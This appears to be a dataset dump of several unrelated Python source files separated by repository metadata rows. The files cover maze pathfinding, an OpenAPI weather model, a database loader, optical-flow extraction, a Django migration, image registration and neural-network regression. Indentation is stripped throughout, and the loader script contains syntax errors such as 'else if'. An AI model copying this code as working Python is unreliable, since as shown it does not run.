di = [0, -1, 0, 1] # Зміщення по рядках
dj = [-1, 0, 1, 0] # Зміщення по стовпчиках
# dj = [-1, -1, 0, 1, 1, 1, 0, -1] # Зміщення по рядках
# di = [0, -1, -1, -1, 0, 1, 1, 1] # Зміщення по стовпчиках
def findWay(maze, start, end):
""" Шукає шлях у лабіринті
:param maze: Матриця лабіринту
:param start: Початкова точка шляху
:param end: Кінцева точка шляху
:return: Список, клітин шляху
"""
waveMatrix = wave(maze, start) # Будуємо хвильову матрицю лабіринту
if waveMatrix[end[0]][end[1]] == -1: # Кінцева точка не досяжна зі стартової - шляху не існує
return []
stack = Stack() # Будуємо шлях за допомогою стеку
current = end # Рух починаємо з кінця
while True:
stack.push(current) # Вштовхуємо у стек поточку клітину шляху
if current == start: # Якщо поточка вершина шляху є стартовою
break # Усі клітини шляху містяться у стеку
i = current[0] # координата поточного рядка матриці
j = current[1] # координата поточного стовчика матриці
for k in range (len(dj)):
i1 = i + di[k] # координата рядка сусідньої клітини
j1 = j + dj[k] # координата стовпчика сусідньої клітини
# Шукаємо клітину з якої ми прийшли у поточну
current = None
if waveMatrix[i1][j1] == waveMatrix[i][j] - 1:
current = (i1, j1)
break
# Відновлюємо шлях зі стеку
way = []
while not stack.empty():
way.append(stack.pop())
return way
if __name__ == "__main__":
maze = readMazeFromFile("maze.txt", 7)
way = findWay(maze, (3, 3), (7, 7))
print(way)
| [
"Krenevych"
] | Krenevych |
5bb5c4b02a0bc44e5dc8e8d0385746704ce0e2bf | d989c42f7122b783bbf330fbb194c8872c947424 | /deutschland/dwd/model/warning_nowcast.py | ed2f3f91637ac4e2040d7329d57b3e024f96839d | [
"Apache-2.0"
] | permissive | auchtetraborat/deutschland | 3c5c206cbe86ad015c7fef34c10e6c9afbc3b971 | fdc78d577c5c276629d31681ffc30e364941ace4 | refs/heads/main | 2023-08-24T08:17:51.738220 | 2021-10-20T19:35:46 | 2021-10-20T19:35:46 | 403,704,859 | 0 | 0 | Apache-2.0 | 2021-09-06T17:19:21 | 2021-09-06T17:19:20 | null | UTF-8 | Python | false | false | 11,997 | py | """
Deutscher Wetterdienst: API
Aktuelle Wetterdaten von allen Deutschen Wetterstationen # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from deutschland.dwd.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from deutschland.dwd.exceptions import ApiAttributeError
def lazy_import():
from deutschland.dwd.model.warning_nowcast_warnings import WarningNowcastWarnings
globals()["WarningNowcastWarnings"] = WarningNowcastWarnings
class WarningNowcast(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (
bool,
date,
datetime,
dict,
float,
int,
list,
str,
none_type,
) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
"time": (int,), # noqa: E501
"warnings": ([WarningNowcastWarnings],), # noqa: E501
"binnen_see": (
str,
none_type,
), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
"time": "time", # noqa: E501
"warnings": "warnings", # noqa: E501
"binnen_see": "binnenSee", # noqa: E501
}
read_only_vars = {}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""WarningNowcast - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
time (int): [optional] # noqa: E501
warnings ([WarningNowcastWarnings]): [optional] # noqa: E501
binnen_see (str, none_type): [optional] # noqa: E501
"""
_check_type = kwargs.pop("_check_type", True)
_spec_property_naming = kwargs.pop("_spec_property_naming", False)
_path_to_item = kwargs.pop("_path_to_item", ())
_configuration = kwargs.pop("_configuration", None)
_visited_composed_classes = kwargs.pop("_visited_composed_classes", ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
% (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set(
[
"_data_store",
"_check_type",
"_spec_property_naming",
"_path_to_item",
"_configuration",
"_visited_composed_classes",
]
)
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""WarningNowcast - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
time (int): [optional] # noqa: E501
warnings ([WarningNowcastWarnings]): [optional] # noqa: E501
binnen_see (str, none_type): [optional] # noqa: E501
"""
_check_type = kwargs.pop("_check_type", True)
_spec_property_naming = kwargs.pop("_spec_property_naming", False)
_path_to_item = kwargs.pop("_path_to_item", ())
_configuration = kwargs.pop("_configuration", None)
_visited_composed_classes = kwargs.pop("_visited_composed_classes", ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
% (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(
f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes."
)
| [
"wirthra@gmail.com"
] | wirthra@gmail.com |
a75f3d6ce4ca8f601dfb55f9cad6a8c16d8b3f44 | 014ba73c9c3decfa8aa9285843631e5c98570cbd | /Database/load_db_tool.py | ddc0e8f2c5103aa1b7325940196c7bf09475cd5a | [] | no_license | CSPB-3308/Travel-Recommender | e8c14161029f418f1e35473ef3c63695e0b84166 | c243990e6b530b05b975c04c07a8ba03acb6835b | refs/heads/master | 2023-01-28T22:00:40.867905 | 2020-12-12T01:53:57 | 2020-12-12T01:53:57 | 296,483,890 | 0 | 0 | null | 2020-11-23T02:59:07 | 2020-09-18T01:39:37 | Python | UTF-8 | Python | false | false | 1,293 | py | #!/usr/bin/env python3
import os
import sys
import query_db
if __name__ == '__main__':
if len(sys.argv) != 3:
print("Usage: load_db_tool.py [-D, -d, -a, -l] [filename]")
print("-D: Destination File\n -d: Dining File\n -a: Attractions File\n -l: Lodging File")
else:
fileType = sys.argv[1]
fileName = sys.argv[2]
file = open(fileName, 'r')
lines = file.readlines()
queryHandler = query_db.QueryHandler()
for line in lines:
dataFields = line.split()
if fileType == "-a":
queryHandler.addAttraction(dataFields[0], dataFields[1], dataFields[2], dataFields[3], dataFields[4])
else if fileType == "-d":
queryHandler.addDining(dataFields[0], dataFields[1], dataFields[2], dataFields[3], dataFields[4], dataFields[5])
else if fileType == "-D":
queryHandler.addDestination(dataFields[0], dataFields[1], dataFields[2])
else if fileType == "-l"
queryHandler.addLodging(dataFields[0], dataFields[1], dataFields[2], dataFields[3], dataFields[4])
file.close()
queryHandler.close_conn() | [
"brhi6213@colorado.edu"
] | brhi6213@colorado.edu |
a01bdca1898fdadec08676b45c4bfbf7d587cc88 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_397/ch6_2020_03_04_19_39_52_514053.py | d80fe50cbca06aa26b98b832df81cd9961a2fad3 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 61 | py | def celsius_para_fahrenheit (C):
F= C*9/5+32
return F | [
"you@example.com"
] | you@example.com |
58021783ebe0d148a20a82e782c7f7581be8d74d | 7fc09f7de6c571c52348c1a40ed8b90c53cade22 | /optical.py | f3d6dd04aa31edbfe002d9502ff59d2b2cf9f819 | [] | no_license | rachidasen/Content-Based-Video-Classification | baf8bf22044cd522bbc124e1ee29d95eb13dfaef | 256311209655ea22a67f544fff8802e62c90a670 | refs/heads/master | 2021-09-29T03:19:04.026202 | 2018-11-23T08:14:33 | 2018-11-23T08:14:33 | 54,796,532 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,305 | py | import cv2
import sys
import os
import glob
import numpy as np
# list of all classes
def gen_frame(path):
classes=('basketball','diving','horse_riding','soccer_juggling','swing','trampoline_jumping','walking','biking',
'golf_swing','tennis_swing','volleyball_spiking');
# get the parent directory where this program is stored
dir=path
#print dir
# concatenate the path to videos' folder
save=os.path.join(dir,"frames")
dir=os.path.join(dir,"frames")
count=0
#print dir
#print save
if not os.path.exists(save):
os.mkdir(save)
for category in classes:
#print category
# category='basketball'
rootdir=os.path.join(dir,category)
#print rootdir
# print subFolders,files
print "Name of video file"
#count+=1
#count2=0
for dirpath,dirname,files in os.walk(rootdir):
# print "dirname",type(dirpath)
#print files
"""x=dirpath.rfind("/")
print x
print dirpath[x+1:],dirpath
print "files",files"""
#print dirpath
# if not os.path.exists(os.path.join(save,dirpath[x+1:],dirpath)):
# os.mkdir(os.path.join(save,dirpath[x+1:],dirpath))
files=glob.glob(dirpath+"/*.mpg")
#print files
#print "\n"
#print count2
#count2+=1
#print "/n"
if files:
print files
#print count
#count+=1
for video_dir in files:
# capturing the location of video
print "dirpath",dirpath,"video",video_dir
print count
count+=1
# video_dir=os.path.join(dirpath,vid)
# print video_dir
x=video_dir.rfind(".")
new=video_dir[:x]
if not os.path.isdir(new):
os.mkdir(new)
# os.system("mkdir new/optical_flow_images")
count=0
video = cv2.VideoCapture(video_dir)
if video.grab():
# Now write your code
# input availabe
# video =name of video
# directory= new
try:
ret, frame1 = video.read()
frame1=cv2.resize(frame1,(150,150))
prvs = cv2.cvtColor(frame1,cv2.COLOR_BGR2GRAY)
while(1):
ret, frame2 = video.read()
if frame2==None:
break
count+=1
if count==300:
break
#print ()
frame2=cv2.resize(frame2,(150,150))
next=cv2.cvtColor(frame2,cv2.COLOR_BGR2GRAY)
flow=cv2.calcOpticalFlowFarneback(prvs,next, None, 0.5, 3, 15, 3, 5, 1.2, 0)
horz = cv2.normalize(flow[...,0], None, 0, 255, cv2.NORM_MINMAX)
vert = cv2.normalize(flow[...,1], None, 0, 255, cv2.NORM_MINMAX)
horz = horz.astype('uint8')
vert = vert.astype('uint8')
pic=new+'/h'+str(count)
pic1=new+'/v'+str(count)
cv2.imwrite(pic+'.jpg',horz)
cv2.imwrite(pic1+'.jpg',vert)
prvs = next
video.release()
except Exception, e:
print e
# generate optical frames and write to the directory new
#cv2.destroyAllWindows()
# print "generating frames"
# i=0
# #ret=True
# ret,frame1=video.read()
# print ret
# if frame1==None:
# break
# while(ret):
# try:
# #ret,frame1=video.read()
# #print ret
# #print frame1
# if ret:
# frame1=cv2.resize(frame1,(150,150))
# prvs = cv2.cvtColor(frame1,cv2.COLOR_BGR2GRAY)
# #hsv = np.zeros_like(frame1)
# #hsv[...,1] = 255
# ret, frame2 = video.read()
# next = cv2.cvtColor(frame2,cv2.COLOR_BGR2GRAY)
# flow = cv2.calcOpticalFlowFarneback(prvs,next, None, 0.5, 3, 15, 3, 5, 1.2, 0)
# mag, ang = cv2.cartToPolar(flow[...,0], flow[...,1])
# hsv[...,0] = ang*180/np.pi/2
# hsv[...,2] = cv2.normalize(mag,None,0,255,cv2.NORM_MINMAX)
# bgr = cv2.cvtColor(hsv,cv2.COLOR_HSV2BGR)
# #cv2.imshow('frame2',bgr)
# #k = cv2.waitKey(300) & 0xff
# print "here k"
# if k == 27:
# print "here 2",k
# break
# #elif k == ord('s'):
# pic=new+"/"+'opticalfb'+str(i)+".jpg"
# pic1=new+"/"+'opticalhsv'+str(i)+".jpg"
# print pic
# print pic1
# cv2.imwrite(pic,frame2)
# cv2.imwrite(pic1,bgr)
# i+=1
# prvs = next
# #pic=new+"/"+str(i)+".bmp"
# # print pic
# #cv2.imwrite(pic,frame)
# print "outside loop"
# #i+=1"""
# except (IOError,RuntimeError, TypeError, NameError):
# print "skipping"
# os.remove(video_dir)
# print i
# making frames of a video
# if video.grab()"""
if __name__=="__main__":
# edit this path where the video is present
gen_frame("/home/karpathy")
| [
"rachidasen@users.noreply.github.com"
] | rachidasen@users.noreply.github.com |
f1e7f09a5a72760fa6841d7afb3fe30b0752ed3f | 1fab020c04b1dcd0d2d528d68f9eeec33797d8bb | /library/system/migrations/0011_studentissued.py | acb96463fc9d949f4ee8477b3ca602b8435fe6f8 | [] | no_license | riya-mistry/LibraryManagementSystem | 88ff19ecc4126f07b8d1b3b73b85763775d3c1db | 87d73c0dea80e0046e2ce3fe113f84885bb59691 | refs/heads/master | 2022-04-21T11:56:33.982036 | 2020-04-22T15:16:22 | 2020-04-22T15:16:22 | 257,936,509 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 847 | py | # Generated by Django 3.0.1 on 2020-01-29 11:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('student', '0001_initial'),
('system', '0010_delete_studentissued'),
]
operations = [
migrations.CreateModel(
name='StudentIssued',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('date', models.DateField(auto_now=True)),
('return_date', models.DateField()),
('book_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='system.Books')),
('student_id', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='student.Student')),
],
),
]
| [
"riyamistry2904@gmail.com"
] | riyamistry2904@gmail.com |
dfae22d85da588a85268d051bfcf5c3d95ee9746 | 59b464d7c6b44f3bae33ded569b2ce0e9c8f897d | /Learning_projects/SimpleITK_pruebas/pruebas/ImageRegistrationMethodDisplacement1.py | 13854acc22a7409d40499ee12593a02dd3bdc622 | [] | no_license | Rmartin20/Regim-project | 6ef48495f95d5b8907a925a2e9af20efad99bdb1 | 7ebe18dfabf733172a75fa28862640639664432d | refs/heads/master | 2020-03-29T20:50:06.913419 | 2018-09-27T16:52:34 | 2018-09-27T16:52:34 | 150,333,511 | 0 | 0 | null | 2018-09-25T21:51:42 | 2018-09-25T21:51:41 | null | UTF-8 | Python | false | false | 3,967 | py | from __future__ import print_function
import SimpleITK as sitk
from PIL import Image
import sys
import os
def command_iteration(method):
if method.GetOptimizerIteration() == 0:
print("\tLevel: {0}".format(method.GetCurrentLevel()))
print("\tScales: {0}".format(method.GetOptimizerScales()))
print("#{0}".format(method.GetOptimizerIteration()))
print("\tMetric Value: {0:10.5f}".format(method.GetMetricValue()))
print("\tLearningRate: {0:10.5f}".format(method.GetOptimizerLearningRate()))
if method.GetOptimizerConvergenceValue() != sys.float_info.max:
print("\tConvergence Value: {0:.5e}".format(method.GetOptimizerConvergenceValue()))
def command_multiresolution_iteration(method):
print("\tStop Condition: {0}".format(method.GetOptimizerStopConditionDescription()))
print("============= Resolution Change =============")
fixed_file = '../images/fixedImage.png'
moving_file = '../images/movingImage.png'
fixed = sitk.ReadImage(fixed_file, sitk.sitkFloat32)
moving = sitk.ReadImage(moving_file, sitk.sitkFloat32)
initialTx = sitk.CenteredTransformInitializer(fixed, moving, sitk.AffineTransform(fixed.GetDimension()))
R = sitk.ImageRegistrationMethod()
R.SetShrinkFactorsPerLevel([3, 2, 1])
R.SetSmoothingSigmasPerLevel([2, 1, 1])
R.SetMetricAsJointHistogramMutualInformation(20)
R.MetricUseFixedImageGradientFilterOff()
R.SetOptimizerAsGradientDescent(learningRate=1.0,
numberOfIterations=100,
estimateLearningRate=R.EachIteration)
R.SetOptimizerScalesFromPhysicalShift()
R.SetInitialTransform(initialTx, inPlace=True)
R.SetInterpolator(sitk.sitkLinear)
R.AddCommand(sitk.sitkIterationEvent, lambda: command_iteration(R))
R.AddCommand(sitk.sitkMultiResolutionIterationEvent, lambda: command_multiresolution_iteration(R))
outTx = R.Execute(fixed, moving)
print("-------")
print(outTx)
print("Optimizer stop condition: {0}".format(R.GetOptimizerStopConditionDescription()))
print(" Iteration: {0}".format(R.GetOptimizerIteration()))
print(" Metric value: {0}".format(R.GetMetricValue()))
displacementField = sitk.Image(fixed.GetSize(), sitk.sitkVectorFloat64)
displacementField.CopyInformation(fixed)
displacementTx = sitk.DisplacementFieldTransform(displacementField)
del displacementField
displacementTx.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0.0,
varianceForTotalField=1.5)
R.SetMovingInitialTransform(outTx)
R.SetInitialTransform(displacementTx, inPlace=True)
R.SetMetricAsANTSNeighborhoodCorrelation(4)
R.MetricUseFixedImageGradientFilterOff()
R.SetShrinkFactorsPerLevel([3, 2, 1])
R.SetSmoothingSigmasPerLevel([2, 1, 1])
R.SetOptimizerScalesFromPhysicalShift()
R.SetOptimizerAsGradientDescent(learningRate=1,
numberOfIterations=300,
estimateLearningRate=R.EachIteration)
outTx.AddTransform(R.Execute(fixed, moving))
print("-------")
print(outTx)
print("Optimizer stop condition: {0}".format(R.GetOptimizerStopConditionDescription()))
print(" Iteration: {0}".format(R.GetOptimizerIteration()))
print(" Metric value: {0}".format(R.GetMetricValue()))
# sitk.WriteTransform(outTx, sys.argv[3])
if not "SITK_NOSHOW" in os.environ:
# sitk.Show(displacementTx.GetDisplacementField(), "Displacement Field")
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(fixed)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetDefaultPixelValue(100)
resampler.SetTransform(outTx)
out = resampler.Execute(moving)
simg1 = sitk.Cast(sitk.RescaleIntensity(fixed), sitk.sitkUInt8)
simg2 = sitk.Cast(sitk.RescaleIntensity(out), sitk.sitkUInt8)
cimg = sitk.Compose(simg1, simg2, simg1//2.+simg2//2.)
nda = sitk.GetArrayViewFromImage(cimg)
my_pil = Image.fromarray(nda)
my_pil.show()
# sitk.Show(cimg, "ImageRegistration1 Composition")
| [
"fandig27@gmail.com"
] | fandig27@gmail.com |
4cf44b39fa07b6be387b485b0852216579c88b72 | 6cd3060abd6c7467715f73f276d2f4d5f9f5175c | /backend/apps/api/offers/__init__.py | e94327a9d2bba8a28321b8930fb73db377105e1f | [] | no_license | Digitize-me/gpb-corporate-application | 3e2ef645d34802621badc630ab445d15428aeb5e | d59d146e131b49a670e3ac4752ea91aa7e148e51 | refs/heads/master | 2022-11-07T16:39:39.876126 | 2020-06-20T22:53:22 | 2020-06-20T22:53:22 | 273,590,113 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | default_app_config = "apps.api.offers.apps.OffersConfig"
| [
"wsxxx2016@yandex.ru"
] | wsxxx2016@yandex.ru |
b74694eff0fe4b7585e4284a0e8af80807315e0a | 9a88de8e9295db765889626d7345976fc385964e | /4thSec/q39.py | 43bacb8c75cdca9e0443bcdb557da64f3ee72eb5 | [] | no_license | rhi222/100fungo | cbf0fef420afdad8f2754bc799ac7b4f66624fc3 | 3d6c5fed9f6533b2f78e877347220090c985d3be | refs/heads/master | 2021-01-12T15:53:45.179887 | 2017-05-05T09:45:02 | 2017-05-05T09:45:02 | 71,901,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,068 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# 39.py
from q30 import tabbed_str_to_dict
from q36 import get_frequency
from pprint import pprint
from collections import defaultdict
# https://docs.python.jp/3/library/collections.html#collections.defaultdict
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
import numpy as np
if __name__ == '__main__':
with open('neko.txt.mecab', encoding='utf-8') as f:
morphemes = [tabbed_str_to_dict(line) for line in f]
frequency = get_frequency([morpheme['surface'] for morpheme in morphemes])
frequency = sorted(frequency.items(), key=lambda x:x[1], reverse=True)
fig = plt.figure(figsize=(10, 6))
freq = list(dict(frequency).values())
freq.sort(reverse=True)
rank = list(range(1, len(freq) + 1))
ax3 = fig.add_subplot(133)
ax3.plot(freq, rank)
ax3.set_xlabel('Rank')
ax3.set_ylabel('Frequency')
ax3.set_title('Zipf low')
ax3.set_xscale('log')
ax3.set_yscale('log')
fig.savefig('morphological_analysis.png')
plt.show()
| [
"ryouhei222@gmail.com"
] | ryouhei222@gmail.com |
e2bcbcc8eabdb541cdd13185af9f8b4f40943c05 | 79bf34ad2894c92a8ad887404225295595313958 | /ex44d.py | 3641234825b4c46314357fee5adaa74cce562d33 | [
"MIT"
] | permissive | sogada/python | 98ac577a18d709a13ace2a56d27e675edeeb032b | 4bdad72bc2143679be6d1f8722b83cc359753ca9 | refs/heads/master | 2020-04-21T00:12:44.872044 | 2015-10-29T20:18:02 | 2015-10-29T20:18:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | class Parent(object):
def override(self):
print "PARENT override()"
def implicit(self):
print "PARENT implicit()"
def altered(self):
print "PARENT altered()"
class Child(Parent):
def override(self):
print "CHILD override()"
def altered(self):
print "CHILD, BEFORE PARENT altered()"
super(Child, self).altered()
print "CHILD, AFTER PARENT altered()"
dad = Parent()
son = Child()
#Child inherits implicit
dad.implicit()
son.implicit()
#Child overrides the override() function from Parent
dad.override()
son.override()
#Child overrides the altered() method from Parent, then uses super
#to inherit and use the original function from Parent
dad.altered()
son.altered()
| [
"alexander.liggett@gmail.com"
] | alexander.liggett@gmail.com |
5bdd168eca6ca9a05b5765cb0375fb4bd7b45dc1 | 16f0171b1aecb8d104a208df4953884a9ab97b26 | /googlenet_regression/get_regressions_batch.py | 5412aac0db52a3a1cebf4611c8f5168f70565739 | [] | no_license | gombru/LearnFromWebData | 97538dd91822a0e2a7d12084cde0d9dbf64f3c70 | 163447027c856004836abe40d9f653ec03da0702 | refs/heads/master | 2020-03-24T23:12:43.819864 | 2018-08-01T12:25:10 | 2018-08-01T12:25:10 | 143,123,717 | 13 | 7 | null | null | null | null | UTF-8 | Python | false | false | 2,341 | py | import caffe
import numpy as np
from PIL import Image
import os
caffe.set_device(0)
caffe.set_mode_gpu()
test = np.loadtxt('../../../datasets/SocialMedia/word2vec_mean_gt/test_InstaCities1M.txt', dtype=str)
# test = np.loadtxt('../../../datasets/WebVision/info/test_filelist.txt', dtype=str)
#Model name
model = 'WebVision_Inception_frozen_word2vec_tfidfweighted_divbymax_iter_460000'
#Output file
output_file_dir = '../../../datasets/SocialMedia/regression_output/' + model
if not os.path.exists(output_file_dir):
os.makedirs(output_file_dir)
output_file_path = output_file_dir + '/test.txt'
output_file = open(output_file_path, "w")
# load net
net = caffe.Net('../googlenet_regression/prototxt/deploy.prototxt', '../../../datasets/WebVision/models/saved/'+ model + '.caffemodel', caffe.TEST)
size = 227
# Reshape net
batch_size = 250 #300
net.blobs['data'].reshape(batch_size, 3, size, size)
print 'Computing ...'
count = 0
i = 0
while i < len(test):
indices = []
if i % 100 == 0:
print i
# Fill batch
for x in range(0, batch_size):
if i > len(test) - 1: break
# load image
# filename = '../../../datasets/WebVision/test_images_256/' + test[i]
filename = '../../../datasets/SocialMedia/img_resized_1M/cities_instagram/' + test[i].split(',')[0] + '.jpg'
im = Image.open(filename)
im_o = im
im = im.resize((size, size), Image.ANTIALIAS)
indices.append(test[i])
# Turn grayscale images to 3 channels
if (im.size.__len__() == 2):
im_gray = im
im = Image.new("RGB", im_gray.size)
im.paste(im_gray)
#switch to BGR and substract mean
in_ = np.array(im, dtype=np.float32)
in_ = in_[:,:,::-1]
in_ -= np.array((104, 117, 123))
in_ = in_.transpose((2,0,1))
net.blobs['data'].data[x,] = in_
i += 1
# run net and take scores
net.forward()
# Save results for each batch element
for x in range(0,len(indices)):
topic_probs = net.blobs['probs'].data[x]
topic_probs_str = ''
for t in topic_probs:
topic_probs_str = topic_probs_str + ',' + str(t)
output_file.write(indices[x].split(',')[0] + topic_probs_str + '\n')
output_file.close()
print "DONE"
print output_file_path
| [
"raulgombru@gmail.com"
] | raulgombru@gmail.com |
7b2c7f166d834ca3fb1cae9d6917b6f754616c21 | e5caec1d30321442d4db893a24edadcaf0b11046 | /blog/migrations/0004_all_ks_join.py | 87edb04f5ebbcc92d682041ebef2c7257a8423a8 | [] | no_license | cqcum6er/my-first-blog | 6e6002f2570c8cd65d20bb9e66d9f2fc75450e7c | ab4f6bc2ee6cd94fff6025b00539473d92889dce | refs/heads/master | 2020-05-21T04:40:33.390634 | 2019-03-16T01:14:35 | 2019-03-16T01:14:35 | 36,615,187 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,832 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('blog', '0003_auto_20180617_1227'),
]
operations = [
migrations.CreateModel(
name='all_ks_join',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('Day', models.DateField(default=b'2018-06-17')),
('Symbol', models.CharField(default=b'N/A', max_length=20)),
('LastPrice', models.CharField(default=b'N/A', max_length=30)),
('FiftyTwoWkChg', models.CharField(default=b'N/A', max_length=30)),
('FiftyTwoWkHi', models.CharField(default=b'N/A', max_length=30)),
('FiftyTwoWkLo', models.CharField(default=b'N/A', max_length=30)),
('DivYild', models.CharField(default=b'N/A', max_length=30)),
('TrailPE', models.CharField(default=b'N/A', max_length=30)),
('ForwardPE', models.CharField(default=b'N/A', max_length=30)),
('PEG_Ratio', models.CharField(default=b'N/A', max_length=30)),
('PpS', models.CharField(default=b'N/A', max_length=30)),
('PpB', models.CharField(default=b'N/A', max_length=30)),
('Market_Cap', models.CharField(default=b'N/A', max_length=30)),
('Free_Cash_Flow', models.CharField(default=b'N/A', max_length=30)),
('Market_per_CashFlow', models.CharField(default=b'N/A', max_length=30)),
('Enterprise_per_EBITDA', models.CharField(default=b'N/A', max_length=30)),
('Name', models.CharField(default=b'N/A', max_length=50)),
],
),
]
| [
"ericsun1221@yahoo.com"
] | ericsun1221@yahoo.com |
da8e583410219e642e0741762147c28e7668e431 | dd916f3c772aa40e19764e47f6ebfc3eff28f8a7 | /lcd.py | 548a699bf551582ffbaa981529cf4e92c29dfccb | [] | no_license | StefanTobler/LCD-Countdown | 955b61490c8f1571ff0947cff2ff64cbf5711462 | 359eda59197af8ce4ac1290b565d365e105bdbea | refs/heads/master | 2021-09-08T09:34:32.355809 | 2021-08-29T18:44:36 | 2021-08-29T18:44:36 | 176,606,300 | 0 | 0 | null | 2021-08-29T18:44:37 | 2019-03-19T22:10:21 | Python | UTF-8 | Python | false | false | 4,729 | py | #!/usr/bin/python
#--------------------------------------
# ___ ___ _ ____
# / _ \/ _ \(_) __/__ __ __
# / , _/ ___/ /\ \/ _ \/ // /
# /_/|_/_/ /_/___/ .__/\_, /
# /_/ /___/
#
